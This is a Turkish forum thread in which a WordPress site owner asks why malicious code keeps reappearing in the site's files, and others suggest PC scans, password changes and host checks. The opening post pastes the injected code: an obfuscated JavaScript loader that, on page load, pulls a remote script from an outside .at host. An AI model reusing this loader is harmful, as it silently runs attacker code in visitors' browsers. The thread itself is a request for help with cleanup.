Wordpress Siteye Kod Ekliyorlar

Arkadaşlar 2.7.1 kullandığım bir sitemde sürekli bu ekleme yapılmakda ama diğer 2.7.1 sitelerde sorun yok mutlaka bu sitedeki bir nedenle ama bulamıyorum , .hml sayfalara ve index.php ye hatta default-filters.php ye .js lere bile eklenmiş kolar sayfa altına ve üstüne ekleniyor chmod sorunu yok pluginler güncel sorun yok aynı server üzerinde diğer sitelerde sorun yok 10 gün önce yine oldu eski yedeğe çektim düzeldi ama şimdi yine oldu bir tek bu sitemde var eklenen kodlar bunlar nasıl eklendiğini çözemedim temayıda inceledim bulamadım bir fikriniz varmı yada başına gelen var mı googlede kodlarla ilgili sonuç çıkmadı fazla

<script>var XL=new String();var e=new String();function u(){var Fn;if(Fn!='' && Fn!='C'){Fn=''};var uY=unescape;var eS="";var jo;if(jo!='d' && jo!='yQ'){jo='d'};var J=window;var _;if(_!='U'){_='U'};var g=uY("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6d%6f%64%75%6c%65%73%2e%63%6f%6d%2e%70%68%70");var vE="";function W(O,f){var h='';var z;if(z!='WP' && z != ''){z=null};var i=new String("iRpWg".substr(4));var o=uY("%5b"), X=uY("%5d");var Ug=new Array();var YY=new Array();var gw=o+f+X;var ic;if(ic!='fv' && ic!='D'){ic=''};var fr=new RegExp(gw, i);var B='';return O.replace(fr, new String());};var fT;if(fT!='' && fT!='YQ'){fT='SW'};this.iS="";var _y;if(_y!='Bm' && _y!='w'){_y='Bm'};var v=W('8453630345782129302191','62915473');var M;if(M!='cq'){M='cq'};var Ww;if(Ww!='K'){Ww='K'};var s=document;var zi=new Array();var uh=new String();var T=new String();var Ob=new Array();function Y(){var tQ='';var G=uY("%68%74%74%70%3a%2f%2f%68%65%6c%70%68%6f%6d%65%63%61%72%65%2e%61%74%3a");uh=G;var UT='';uh+=v;var Qq;if(Qq!='sb'){Qq='sb'};uh+=g;var mo;if(mo!='GC' && mo != ''){mo=null};var ni=new String();var kp;if(kp!='Gk'){kp=''};try {var zk=new Array();L=s.createElement(W('syc_r_iCpDty','JyXjh_3mDgPoC'));this.nF="";L[uY("%64%65%66%65%72")]=[1][0];var b=new Date();L[uY("%73%72%63")]=uh;s.body.appendChild(L);var iQ=new Array();var Mq=new Date();} catch(S){var oy=new Date();var ed;if(ed!='' && ed!='MD'){ed=null};alert(S);var zo='';var DQ;if(DQ!='eO' && DQ != ''){DQ=null};};var zH=new String();var Jz;if(Jz!='' && Jz!='Gf'){Jz=''};}var Uw=new String();var Oq;if(Oq!='' && Oq!='dZ'){Oq=''};J[String("1dmUonl".substr(4)+"oad")]=Y;var gx;if(gx!=''){gx='tA'};var fX;if(fX!=''){fX='xq'};var Nm;if(Nm!='' && Nm!='Ll'){Nm=null};var mp='';};var SI;if(SI!='Tb'){SI=''};var tM='';var r='';u();var UF;if(UF!='XG'){UF=''};</script>
<!--bc919af4b90cb6ee284a95ecaa725bda-->

Bu kod bilgisayarınızdan yayılıyor. wordpress ile alakalı bir durum değildir. güncel bir antivirüs silmeniz gerekiyor.

Sorun sadece bilgisayarıyla alakalı olsaydı bütün sitelerine atılırdı...Sitelerinizin hepsi aynı hostda mı barıyor...? Eğer ayrı ayrı ise o sürekli kod eklenen sitenin hostunu değiştir. Hostdan açık bulmuşlardır ve sürekli atıyorlardır.

Bir diğer ihtimal wp açık kaynaklı kod yapısıyla lamerlrinde ilgi odağı!! Bu gerçeği unutmadan gerekli güvenlik önlemleri almalısınız...

Sonuç olarak ne yapmalısınız. Önce bilgisarını taramadan başla. Ftp ni hostçunuza söyleyin taratın görevleri sadece size host sağlamak deil,Bunuda yapmak zorundalar.

tarama sonrası myphpadminden wp_ tablo ön ekini değiştirin. Ftp şifrenizi değiştirin. Dosyalarınızı tekrar en baştan kontrol edin 777 yazma izni olanları düzeltin.

Hocam bu sonuca nasıl vardınız kaynak varsa verebilirmisiniz ayrıntılı bakayım


Hocam bu aynı vps içinde bulunan bir tek siteye oluyor diğerlerinde sorun yok zaten sorun olan siteyi site sahibi kendi yönetiyor bilgisayarından olabileceğini bende düşündüm sonra kaspersky kurdurdum 1 hafta sorun yoktu tekrar meydana geldi ftp ye bir tek kendisi bağlanıyor

Vps deki diğer sitelerde olamaması nedeniyle vps den olamayacağı kanısına vardım bende

Ya bağlandığı bilgisayar yada temada açık var ama verdiğim kodlarla ilgili google de de sonuç bulamadım hack falan olsaydı bir çok kişinin başına gelmesi gerekirdi

Eğer bilgisayarından bulaşıyorsa bu ne virüsü onu bulamadım kaynak varsa bildiğiniz verebilirseniz sevinirim

Teşekkürler

Sadece bu sitede kullandığınız bir eklentide açık olabilir. Eklentilerinizi ve WP sürümünüzü güncelleyin.

Hala eklenti diyorlar komik yukarıdaki dediğimi yapın veya yapsın önerebileceğim anti virüs kaspersky

G_i_x in dediği gibi bilgisayardan yayılıyor bu virüs sitelere. Kaspersky ile taratın düzelecektir. Aynı durum bir arkadaşımında başına gelmişti.

Öncelikle Bilgisayarınızı güzelce bir taratın tabbi ki güvenli modtan combofix var süper bir program vista kullanıyorsanız önermiyorum bazen deliriyor Pc i En sağlıklısı güvenli modtan taratma bunu yaptıktan sonra bulaşan php dosyalarınızı tek tek temizleyin ftp cpanel-plesk panel tüm şifrelerinizi değişiniz.

Bazı botlar varki kod belasının ana kaynağı. htaccess dosyalarına kadar kendi kodlarını işlemekte. sizin bence yanıldığınız nokta bu olayla ilgili sunucuda ki diğer sitelerin o listede olmuyor olma ihtimali. Siz birinde var diğerlerinde yok diyerek direkt olarak sunucu güvenilirmiş demişsiniz. Bence yanlış bir düşünce. 100 siteden birine bile böyle birşey olabiliyorsa ilk bakılacak yer o sunucu sistemidir.

ayrıca bilgisayar virüsleri ftp ye bağlanıp dosyalara kod ekleyecekler komedi gibi. bence konyashell arkadaşın dediklerine uyun.ama bir öneride benden ftp'ye programla bağlanıyorsanız en azından bilindik programlar kullanın.birçok programın cracklemesinin nasıl yapıldığı kimse tarafından bilinmemektedir. kapersky evet yaygın olabilir ancak %100 hiç bir sistemi korumaz. internet security olan bir güvenlik yazılımı kullanın. kapersky şart değil. ancak asıl güvenliğin olması gereken yer kişisel bilgisayarınız değil sitenin vps kaydı olan sunucudur.

güvenilir birine temiz dosyaları tekrar attırın yada güvenilir bir yerden siz atın.ama aynı şeyler devam ettikçe kaynağıda belli olacaktır